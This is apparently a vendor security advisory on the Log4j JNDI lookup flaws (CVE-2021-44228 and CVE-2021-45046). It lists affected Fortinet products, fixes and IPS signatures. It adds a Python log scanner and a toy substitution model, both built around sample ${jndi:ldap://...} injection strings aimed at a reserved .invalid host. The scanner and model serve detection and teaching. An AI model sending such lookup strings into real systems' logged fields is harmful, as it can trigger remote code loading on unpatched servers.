Apache log4j2 log messages substitution (CVE-2021-44228)
Apache Log4j <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled (CVE-2021-44228).
See the Fortinet Blog for more detail: https://www.fortinet.com/blog/psirt-blogs/apache-log4j-vulnerability
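The lookup string that reaches Log4j is the observable artifact of this vulnerability, so one basic detection is to scan logs that record attacker-controllable fields (request paths, headers such as User-Agent) for the ${jndi:<scheme>://...} pattern. The following scanner is an added example, not code from the Fortinet advisory; the log lines, host names and IP addresses are constructed for the demonstration.

```python
import re
from typing import List, Tuple

# Log4j lookup syntax is ${name:argument}. The lookup abused by CVE-2021-44228 is
# ${jndi:<scheme>://host[:port]/path}, where the scheme names the JNDI endpoint
# type (LDAP in the advisory's description, but other JNDI endpoints exist).
# The name is matched case-insensitively so capitalised variants are caught too.
JNDI_LOOKUP = re.compile(r"\$\{jndi:([a-zA-Z]+)://([^}]*)\}", re.IGNORECASE)

# Constructed sample access-log lines (not real traffic). The final quoted field is
# the User-Agent, a header that applications commonly pass to their logger.
SAMPLE_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:07 +0000] "GET /login HTTP/1.1" 200 2048 "-" '
    '"${jndi:ldap://lookup.example.invalid:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:08 +0000] "GET /api HTTP/1.1" 404 128 "-" '
    '"${JNDI:rmi://lookup.example.invalid:1099/b}"',
    '10.0.0.12 - - [10/Dec/2021:12:00:15 +0000] "GET /static/app.js HTTP/1.1" 200 90210 "-" "curl/7.79.1"',
]


def find_jndi_lookups(lines: List[str]) -> List[Tuple[int, str, str, str]]:
    """Return (line number, source IP, scheme, endpoint) for every JNDI lookup found.

    The source IP is taken as the first whitespace-separated token, which is the
    layout of the constructed sample lines (Combined Log Format style).
    """
    hits = []
    for lineno, line in enumerate(lines, start=1):
        src_ip = line.split(" ", 1)[0]
        for m in JNDI_LOOKUP.finditer(line):
            hits.append((lineno, src_ip, m.group(1).lower(), m.group(2)))
    return hits


def sources_with_lookups(lines: List[str]) -> List[str]:
    """Distinct source IPs that sent at least one JNDI lookup string, in first-seen order."""
    seen = []
    for _, src_ip, _, _ in find_jndi_lookups(lines):
        if src_ip not in seen:
            seen.append(src_ip)
    return seen


if __name__ == "__main__":
    for lineno, src_ip, scheme, endpoint in find_jndi_lookups(SAMPLE_LINES):
        print(f"line {lineno}: {src_ip} sent a JNDI lookup via {scheme} -> {endpoint}")
    print("sources to review:", sources_with_lookups(SAMPLE_LINES))
```

Run it against exported web or application logs line by line; a hit means the string reached something that logged it, which is the condition the advisory describes, so the next step is to confirm whether a vulnerable Log4j version formatted that message.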
The following products are NOT impacted:
FortiClient (All versions)
FortiOS (includes FortiGate & FortiWiFi)
FortiRecorder (includes FortiCamera)
FortiSwitch & FortiSwitchManager
FortiToken & FortiToken Mobile
FortiVoice (includes FortiPhone)
FortiLAN Cloud (includes Switch & AP)
The following products are impacted and fixes are being worked on. This advisory will be updated as soon as ETAs are available:
FortiAIOps - Fixed in version 1.0.2
FortiAnalyzer BigData - Fixed on 2021-12-10 in 6.4.7 & 7.0.2
FortiCASB - Fixed on 2021-12-10
FortiConverter Portal - Fixed on 2021-12-10
FortiCWP - Fixed on 2021-12-10
FortiEDR Cloud - Not exploitable. Additional precautionary mitigations put in place on 2021-12-10
FortiInsight - Not exploitable. Additional precautionary mitigations being investigated.
FortiIsolator - Fix scheduled for version 2.3.4
FortiMonitor - Mitigations for NCM & Elastiflow available
FortiPortal - Fixed in 6.0.8 and 5.3.8
FortiSIEM - Mitigation available
ShieldX - Fix scheduled for versions 2.1 and 3.0 - ETA 2021/12/17
Update: CVE-2021-45046 (CVSS score: 3.9 - Low)
It was found by the Apache Software Foundation (ASF) that the fix they released to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data, when the logging configuration uses a non-default Pattern Layout with either a Context Lookup or a Thread Context Map pattern, to craft malicious input data using a JNDI Lookup pattern, resulting in a denial of service (DoS) attack.
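The difference between the original issue (CVE-2021-44228, lookups resolved inside the log message) and the incomplete fix (CVE-2021-45046, lookups resolved inside Thread Context Map values pulled in by the layout) is easiest to see in a small model of the substitution. The code below is an added example written for this page, not Log4j source and not Fortinet code: it is a simplified model of the ${name:argument} substitution described above, supporting only the ctx and jndi lookup names, and it records the JNDI endpoint that would have been contacted instead of contacting anything. The version labels on the scenarios and the hardened setting are the model's own assumptions about behaviour; the attacker-controlled values are constructed.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Log4j lookups have the form ${name:argument}. This toy model supports "ctx"
# (read a key from the thread context map / MDC) and "jndi" (which a real Log4j
# would turn into a JNDI fetch). Simplified model, not Log4j code.
LOOKUP = re.compile(r"\$\{([a-zA-Z]+):([^}]*)\}")


@dataclass
class RenderResult:
    line: str                                   # the formatted log line
    jndi_endpoints: List[str] = field(default_factory=list)  # endpoints a JNDI fetch would have targeted


def render(pattern: str, message: str, ctx: Dict[str, str],
           message_lookups: bool, substitute_ctx_values: bool) -> RenderResult:
    """Format one log event under a chosen set of substitution rules.

    pattern:               layout string; %m is the message, ${ctx:key} reads the MDC
    message_lookups:       True models Log4j <= 2.14.1 (lookups resolved inside the
                           log message); False models the 2.15.0 default
    substitute_ctx_values: True models 2.15.0 (a value read from the MDC is itself
                           scanned for lookups); False models hardened behaviour
                           where runtime data is inserted verbatim
    """
    result = RenderResult(line="")

    def resolve(text: str) -> str:
        def repl(m: "re.Match[str]") -> str:
            name, arg = m.group(1).lower(), m.group(2)
            if name == "jndi":
                result.jndi_endpoints.append(arg)   # sink reached: record, never fetch
                return "<jndi>"
            if name == "ctx":
                value = ctx.get(arg, "")
                return resolve(value) if substitute_ctx_values else value
            return m.group(0)                        # unknown lookup left untouched
        return LOOKUP.sub(repl, text)

    rendered_msg = resolve(message) if message_lookups else message
    # The layout pattern is trusted configuration, so its own lookups are always
    # resolved. The message is spliced in afterwards so that lookups inside it are
    # governed only by message_lookups.
    placeholder = "\x00"
    layout = resolve(pattern.replace("%m", placeholder))
    result.line = layout.replace(placeholder, rendered_msg)
    return result


def scenarios() -> Dict[str, RenderResult]:
    """The four configurations the advisory text distinguishes, on constructed input."""
    # Constructed attacker-controlled values; the host name is a reserved .invalid name.
    ctx = {"loginId": "${jndi:ldap://lookup.example.invalid:1389/a}"}      # MDC value
    msg = "login failed for ${jndi:ldap://lookup.example.invalid:1389/b}"   # log message
    default_pattern = "%m"
    ctx_pattern = "user=${ctx:loginId} %m"                                   # non-default: Context Lookup
    return {
        "2.14.1, default layout":     render(default_pattern, msg, ctx, True, True),
        "2.15.0, default layout":     render(default_pattern, msg, ctx, False, True),
        "2.15.0, ctx lookup layout":  render(ctx_pattern, msg, ctx, False, True),
        "hardened, ctx lookup layout": render(ctx_pattern, msg, ctx, False, False),
    }


if __name__ == "__main__":
    for name, r in scenarios().items():
        print(f"{name:30} jndi endpoints reached: {r.jndi_endpoints}")
        print(f"{'':30} line: {r.line}")
```

Running it shows the message lookup being reached only in the 2.14.1 scenario, nothing reached with the 2.15.0 default layout, and the MDC value reaching the JNDI lookup again as soon as the layout contains a Context Lookup, which is the non-default configuration the CVE-2021-45046 text describes. The hardened scenario inserts both the message and the MDC value as literal text.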
For full details of protections and detections for the IoCs related to this vulnerability, please see the Log4j2 Vulnerability Outbreak Alert (https://www.fortiguard.com/outbreak-alert/log4j2-vulnerability)
IPS Signature protection (FortiOS)
Fortinet has released the IPS signature Apache.Log4j.Error.Log.Remote.Code.Execution (VID 51006) to address this threat. This signature was initially released in IPS package version 19.215. Please note that, since this is an emergency release, the default action for this signature is set to pass. Please modify the action according to your needs.
As of IPS DB version 19.217 this signature was set to drop by default.
IPS Signature protection (FortiADC & FortiProxy)
FortiADC supports the IPS signature to mitigate Log4j (IPS package version 19.215).
FortiProxy supports the IPS signature to mitigate Log4j (IPS package version 19.215).
Web Application Firewall (FortiWeb & FortiWeb Cloud)
Web Application Firewall signatures to prevent this vulnerability were first added in signature database 0.00305 and have been updated in recent releases to add additional coverage.
Last Updated: Tuesday December 15, 8:50 PM Pacific Time